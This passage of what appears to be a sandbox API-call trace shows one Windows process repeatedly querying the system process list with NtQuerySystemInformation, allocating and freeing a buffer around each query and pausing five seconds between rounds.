RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.282] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.300] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.310] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.321] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.325] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.329] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.364] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.374] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0227.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0227.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0227.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0227.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0227.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0227.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) 